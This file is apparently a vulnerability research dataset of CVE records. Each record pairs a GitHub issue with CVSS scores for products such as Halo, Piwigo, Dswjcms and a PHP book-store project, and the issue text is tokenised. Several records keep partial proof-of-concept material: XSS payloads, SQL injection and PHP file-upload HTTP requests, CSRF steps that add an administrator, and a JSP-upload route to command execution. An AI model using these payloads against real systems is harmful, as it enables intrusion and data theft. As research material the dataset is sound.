        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-19007",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/547",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/547",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2020-02-08T08:43:59Z",
        "description": "Stored xss on Halo blog. APITAG APITAG Environment Server Version NUMBERTAG Admin Version NUMBERTAG APITAG APITAG Vulnerability details APITAG Halo blog allows users to submit comments on blog posts, Application receives data from an untrusted source and not filtered. step1: submit comment FILETAG The post packet is as follows\uff1a ERRORTAG step2: view the blog post After this comment has been submitted, admin who visits the blog post. The script supplied by the attacker will then execute in the victim user's browser. FILETAG FILETAG code: PATHTAG FILETAG Suggestions for repair Proper encoding of untrusted request data Rich text filtering uses a common security API library for each programming language Escaping special characters using the developer's secure escape library APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19037",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/135",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/135",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-04-04T15:13:08Z",
        "description": "Bypass password access to encrypted articles. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x ] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19038",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/136",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/136",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-04-04T17:29:24Z",
        "description": "Any file deletion in the background. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19046",
        "Issue_Url_old": "https://github.com/Aoyanm/audit/issues/1",
        "Issue_Url_new": "https://github.com/pagli0cci/audit/issues/1",
        "Repo_new": "pagli0cci/audit",
        "Issue_Created_At": "2019-04-15T03:11:35Z",
        "description": "s APITAG website system)reflect xss. Vulnerability directory: APITAG Vulnerability code FILETAG Construct payload FILETAG Use code URLTAG APITAG APITAG Got the website cookie FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19047",
        "Issue_Url_old": "https://github.com/Aoyanm/audit/issues/2",
        "Issue_Url_new": "https://github.com/pagli0cci/audit/issues/2",
        "Repo_new": "pagli0cci/audit",
        "Issue_Created_At": "2019-04-15T12:56:42Z",
        "description": "Iwebshop NUMBERTAG csrf vulnerability. Vulnerability overview FILETAG Exploiting Vulnerability code text CODETAG FILETAG Exploit success picture FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19048",
        "Issue_Url_old": "https://github.com/joelister/bug/issues/1",
        "Issue_Url_new": "https://github.com/joelister/bug/issues/1",
        "Repo_new": "joelister/bug",
        "Issue_Created_At": "2019-04-15T03:44:11Z",
        "description": "APITAG NUMBERTAG Cross Site Scripting. Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG New Forum\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG / Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG When an unauthenticated user visits the page, the code gets executed: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19049",
        "Issue_Url_old": "https://github.com/joelister/bug/issues/2",
        "Issue_Url_new": "https://github.com/joelister/bug/issues/2",
        "Repo_new": "joelister/bug",
        "Issue_Created_At": "2019-04-15T04:14:08Z",
        "description": "Persistent XSS on APITAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG New Forum\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: acploginattempts NUMBERTAG APITAG mybb FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19107",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/9",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/9",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2020-01-17T08:35:51Z",
        "description": "there is a sql injection vulnerability in FILETAG parameter \"isbn\". version NUMBERTAG No login required. POC: POST FILETAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG +a&save_change NUMBERTAG FILETAG View source code APITAG APITAG filter input of parameter \"isbn\" author: EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19108",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/10",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/10",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2020-01-17T08:39:23Z",
        "description": "there is a sql injection vulnerability in FILETAG parameter \"pubid\". version NUMBERTAG No login required. POC: URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"pubid\" author: EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19109",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/12",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/12",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2020-01-17T08:47:24Z",
        "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\" . version NUMBERTAG No login required. POC: URLTAG or APITAG a APITAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19110",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/11",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/11",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2020-01-17T08:43:28Z",
        "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\". version NUMBERTAG No login required. POC: URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19111",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/14",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/14",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2020-01-17T08:55:48Z",
        "description": "there is a login bypass vulnerability in FILETAG . version NUMBERTAG No login required. View source code FILETAG APITAG he judgment is that if the query results of login name and password are not the same, the judgment is that the password or user name is wrong This is obviously wrong. According to this meaning, you can log in successfully as long as the user name and password are matched We test that the login name is admin password arbitrary FILETAG Login succuss! APITAG this code to if($name != $row['name'] || $pass != $row['pass']){ author: EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19112",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/13",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/13",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2020-01-17T08:51:12Z",
        "description": "there is a sql injection vulnerability in FILETAG parameter \"bookisbn\" . version NUMBERTAG No login required. POC\uff1a URLTAG or APITAG a FILETAG View source code FILETAG APITAG APITAG filter input of parameter \"bookisbn\" author: EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19113",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/15",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/15",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2020-01-17T09:02:08Z",
        "description": "there is a arbitrary file upload in FILETAG . version NUMBERTAG No login required. POC: upload form APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG or post data POST FILETAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"add NUMBERTAG Content Disposition: form data; name=\"image\"; APITAG Content Type: text/php APITAG NUMBERTAG Content Disposition: form data; name=\"save\" upload NUMBERTAG after you upload your'e file u will find it here PATHTAG FILETAG View source code FILETAG APITAG APITAG check upload file. author: EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19114",
        "Issue_Url_old": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/8",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-book-store-project-in-php/issues/8",
        "Repo_new": "projectworldsofficial/online-book-store-project-in-php",
        "Issue_Created_At": "2020-01-17T08:29:51Z",
        "description": "there is sql injection vulnerability in FILETAG parameter \"publisher\". version NUMBERTAG POC: CODETAG APITAG View source code APITAG APITAG filter input of parameter \"publisher\" author: EMAILTAG .cn",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19118",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/14",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/14",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2019-04-24T13:37:50Z",
        "description": "Stored XSS vulnerability in yzmcms NUMBERTAG Because the data inputed by the user is not effectively filtered, so that attackers can inject javascript code into the HTML page for execution. Anyone who clicks on the page will trigger it The stored XXS vulnerability exists the PATHTAG POC: APITAG alert('XSS!') APITAG FILETAG APITAG the site_code parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19137",
        "Issue_Url_old": "https://github.com/ShuaiJunlan/Autumn/issues/82",
        "Issue_Url_new": "https://github.com/shuaijunlan/autumn/issues/82",
        "Repo_new": "shuaijunlan/autumn",
        "Issue_Created_At": "2019-04-28T05:08:49Z",
        "description": "Infomation Unauthorized. Unauthorized status, you can get account password directly URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19138",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/17796",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/17796",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2020-01-08T07:04:03Z",
        "description": "File Upload. Describe the bug Upload jsp files to control the target server Steps to reproduce the behavior NUMBERTAG APITAG () determines whether uri starts with / asset FILETAG NUMBERTAG Can bypass restricted access to files under assets, like PATHTAG FILETAG FILETAG NUMBERTAG Upload malicious JSP file here FILETAG NUMBERTAG Get file id FILETAG NUMBERTAG Execute arbitrary server commands FILETAG NUMBERTAG Can upload even without authorization FILETAG dir like this FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-1914",
        "Issue_Url_old": "https://github.com/facebook/hermes/issues/373",
        "Issue_Url_new": "https://github.com/facebook/hermes/issues/373",
        "Repo_new": "facebook/hermes",
        "Issue_Created_At": "2020-09-29T21:47:01Z",
        "description": "What should be included in NUMBERTAG This issue is to discuss which fixes should be backported to the next patch release NUMBERTAG Noted that release NUMBERTAG would be exclusively for RN NUMBERTAG branch out after NUMBERTAG is resolved.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19142",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/65",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/65",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-04-28T01:55:13Z",
        "description": "iCMS7 code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19157",
        "Issue_Url_old": "https://github.com/TL-swallow/swallow/issues/14",
        "Issue_Url_new": "https://github.com/tl-swallow/swallow/issues/14",
        "Repo_new": "TL-swallow/swallow",
        "Issue_Created_At": "2019-06-28T04:26:45Z",
        "description": "wenkucms \u4e2a\u4eba\u4e2d\u5fc3\u81ea\u6211\u4ecb\u7ecd XSS. CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19165",
        "Issue_Url_old": "https://github.com/Mint60/PHP/issues/1",
        "Issue_Url_new": "https://github.com/mint60/php/issues/1",
        "Repo_new": "mint60/php",
        "Issue_Created_At": "2020-04-14T04:27:35Z",
        "description": "phpshe NUMBERTAG Blind SQL injection NUMBERTAG ulnerability description Test object NUMBERTAG website: PHPSHE shopping system NUMBERTAG the website domain name: FILETAG NUMBERTAG IP address: FILETAG NUMBERTAG ersion: PHPSHE B2C mall system NUMBERTAG build NUMBERTAG UTF8) Vulnerability description: Lingbao Jianhao network technology co., LTD. PHPSHE cms system background SQL injection vulnerability NUMBERTAG ulnerability details The FILETAG line NUMBERTAG execution flow introduces the FILETAG FILETAG FILETAG Line NUMBERTAG introduces FILETAG FILETAG the FILETAG line NUMBERTAG pe_select function to user level adjustment FILETAG The pe_select function is defined on line NUMBERTAG of PATHTAG In the pe_select function, the value of the userlevel_id parameter has undergone a series of processing of the dowhere function, and finally directly spliced into the sql statement, there is no security filtering. FILETAG The code for the _dowhere function FILETAG NUMBERTAG POC Vulnerability parameter userlevel_id CODETAG Vulnerability verification method: APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19199",
        "Issue_Url_old": "https://github.com/qinggan/phpok/issues/5",
        "Issue_Url_new": "https://github.com/qinggan/phpok/issues/5",
        "Repo_new": "qinggan/phpok",
        "Issue_Created_At": "2019-05-03T07:34:07Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following two page poc\uff1a APITAG add a administrator APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19212",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1009",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1009",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2019-05-05T08:40:59Z",
        "description": "Piwigo NUMBERTAG SQL injection in FILETAG . An SQL injection has been discovered in the administration panel of Piwigo NUMBERTAG The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure. The vulnerability was found in the 'delete' method in FILETAG , because it does not validate and filter the '$group' parameter when it gets the parameters. And the vulnerability could query any data in the database and display it on the page. In the figure, I obtained the encrypted password of the user table. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-19213",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1010",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1010",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2019-05-06T10:00:18Z",
        "description": "Piwigo NUMBERTAG SQL injection in FILETAG . Hi, I found a sql injection vulnerability in APITAG The 'move_categories' method is called when moving the album in APITAG but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability. replace any of the following parameter in POST requests to reappear the vulnerability\uff1a APITAG or APITAG I use 'sqlmap' to reappear the vulnerability: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19215",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1011",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1011",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2019-05-07T10:09:41Z",
        "description": "Piwigo NUMBERTAG SQL injection in FILETAG and FILETAG . hi, I found two new vulnerabilities in FILETAG and FILETAG NUMBERTAG request URLTAG APITAG to have a private album then move the album from the right to the left payload: APITAG or use 'sqlmap' FILETAG FILETAG FILETAG FILETAG NUMBERTAG same as the first, request APITAG APITAG to have a private album then move the album from the right to the left payload: APITAG or use 'sqlmap' FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19217",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1012",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1012",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2019-05-08T08:06:27Z",
        "description": "Piwigo NUMBERTAG SQL injection in FILETAG . APITAG is a vulnerability in the FILETAG . FILETAG I didn't find the full trigger request in the browser, so I added the \u2018&filter_category_use=on\u2019 parameter to the request based on the code. ERRORTAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19228",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1242",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1242",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2020-07-24T09:06:36Z",
        "description": "File upload vulnerability. Bludit NUMBERTAG has a file upload vulnerability in 'backup' plugin . It requires administrator privileges NUMBERTAG open URLTAG Activate 'backup' plugin and click the Settings FILETAG NUMBERTAG open URLTAG upload the ' FILETAG zip file that I provide . The zip file has a FILETAG in the bl content\\uploads directory, Notices: please be careful not to open or modify this zip file, because this will cause an error FILETAG NUMBERTAG click the APITAG Backup' FILETAG NUMBERTAG FILETAG Open the url can see phpinfo ,and can use 'ant' to connect the backdoor via FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-19229",
        "Issue_Url_old": "https://github.com/thinkgem/jeesite/issues/490",
        "Issue_Url_new": "https://github.com/thinkgem/jeesite/issues/490",
        "Repo_new": "thinkgem/jeesite",
        "Issue_Created_At": "2019-05-05T08:10:51Z",
        "description": "jeesite\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e. jeesite APITAG command execution vulnerability\uff09 \u6f0f\u6d1e\u5229\u7528\u8fc7\u7a0b jeesite \u4f7f\u7528\u4e86 apache shiro APITAG FILETAG \u56e0apache APITAG \u4ee5\u516c\u7f51\u67d0\u7f51\u7ad9\u4e3a\u4f8b\uff1a\uff08\u53c2\u8003\uff1a URLTAG \uff09 FILETAG APITAG APITAG \u4fee\u590d\u5efa\u8bae \u5347\u7ea7 Shiro NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19263",
        "Issue_Url_old": "https://github.com/sansanyun/mipcms5/issues/4",
        "Issue_Url_new": "https://github.com/sansanyun/mipjz/issues/4",
        "Repo_new": "sansanyun/mipjz",
        "Issue_Created_At": "2019-05-12T08:48:53Z",
        "description": "Mipcms NUMBERTAG has a CSRF vulnerability that can add the admin user. After the administrator logs in, accessing the following two links can add an administrator user Poc address : URLTAG Add a user: http:// FILETAG FILETAG Promote user privileges to administrator privileges http:// FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19265",
        "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/4",
        "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/4",
        "Repo_new": "tifaweb/dswjcms",
        "Issue_Created_At": "2019-05-14T12:59:19Z",
        "description": "There is a Stored XSS vulnerability in Dswjcms NUMBERTAG A Stored XSS vulnerability exists in Dswjcms NUMBERTAG allowing an remote attacker to execute HTML or APITAG code via the PATHTAG APITAG \"> APITAG APITAG alert(/xss/) APITAG <a Add a Friendship Links FILETAG FILETAG Execute APITAG code FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19266",
        "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/5",
        "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/5",
        "Repo_new": "tifaweb/dswjcms",
        "Issue_Created_At": "2019-05-14T13:05:03Z",
        "description": "There is a Stored XSS vulnerability in Dswjcms NUMBERTAG A Stored XSS vulnerability exists in Dswjcms NUMBERTAG allowing an attacker to execute HTML or APITAG code via the PATHTAG APITAG ERRORTAG Add an article FILETAG FILETAG Execute APITAG code FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19267",
        "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/7",
        "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/7",
        "Repo_new": "tifaweb/dswjcms",
        "Issue_Created_At": "2019-05-14T13:13:23Z",
        "description": "There is a Incorrect Access Control vulnerability in Dswjcms NUMBERTAG Dswjcms NUMBERTAG allowing an attacker to upload and execute arbitrary PHP code via the PATHTAG Upload PHP File Document content: APITAG FILETAG Access this PHP file FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19268",
        "Issue_Url_old": "https://github.com/tifaweb/Dswjcms/issues/6",
        "Issue_Url_new": "https://github.com/tifaweb/dswjcms/issues/6",
        "Repo_new": "tifaweb/dswjcms",
        "Issue_Created_At": "2019-05-14T13:09:59Z",
